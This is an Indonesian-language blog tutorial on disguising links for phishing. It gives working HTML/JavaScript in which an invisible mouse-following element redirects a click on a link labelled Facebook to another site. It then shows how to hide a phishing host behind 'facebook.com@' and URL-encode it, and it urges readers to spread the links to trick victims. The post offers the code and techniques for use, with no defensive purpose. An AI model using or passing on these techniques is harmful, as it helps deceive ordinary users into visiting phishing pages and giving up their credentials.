Entah untuk melakukan Social Engineering seperti membuat Fake Login atau sejenisnya (exp: Manipulasi Adsenseoke langsung aja
Tehnik Pertama (Manipulasi Pada Script)
Langkah awal yang harus kita lakukan adalah dengan membuat file (contoh) index.php yang isinya sebagai berikut
<html>
<body>
<div id="open"
onmouseover="document.location='http://cruzenaldo.com';"
style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
<center>
<br>
<br>
<a href="http://facebook.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">Ini Link Facebook</font></a>
</html> Kemudian ketika kita save lalu UPLOAD pada web hosting anda dan eksekusi maka hasil yang terlihat akan seperti berikut.
EDIT SEKREATIF KALIAN AGAR KORBAN TERKECOH
Ketika kita klik link tersebut maka situs yang akan kita akses adalah cruzenaldo.com padahal saat arahkan mouse pada tulisan “Ini Link Facebook” maka orang awam akan melihat bawah link itu akan mengarahkannya ke link Facebook. Kecuali orang yang sudah paham atau “kurang kerjaan” akan curiga melihat source codenya…
Tapi itupun saya berani bertaruh dia akan kebingungan apabila kita sisipkan script diatas dengan script website kita. Kecuali memang dia benar-benar kurang kerjaan mau menganalisa script dari website kita
Tehnik Kedua (Manipulasi Langsung Pada URL Itu Sendiri)
Jika kita mengakses website http://facebook.com dengan cara seperti berikut http://facebook.com@www.cybersquads.com.blogspot.com maka yang akan muncul adalah blog ini dimana format sebuah browser membaca link tersebut adalah website yang akan kita akses cruzenaldo.com dengan username facebook.com.
Nah dengan modal pengetahuan diatas kita dah bisa melakukan manipulasi url. Caranya adalah bagaimana dimata sang korban hanya terlihat link facebook.com@halaman phising anda
misalnya
http://facebbok.com@myfb.cu.cc
maka yang dieksekusi bukanya facebook melainkan halaman phising fb myfb.cu.cc
Nah dengan modal pengetahuan diatas kita dah bisa melakukan manipulasi url. Caranya adalah bagaimana dimata sang korban hanya terlihat link facebook.com dan untuk @myfb.cu.cc kita bisa melakukan url encoding dengan menggunakan karakter ASCII. Untuk tablenya kalian bisa mengunjungi link berikut sehingga hasilnya seperti ini…
http://facebook.com@%43%52%55%5A%45%4E%41%4C%44%4F.%43%4F%4DJadi ketika kita mengakses link diatas maka yang akan muncul adalah halaman physing myfb.cu.cc
nah sekarang url sudah di manipulasi tinggal sebarkan ke korbany aja se kreatid kreatif kalian menipu
semakin mudah untuk mendapatkan apa yang kalian inginkan
Post a Comment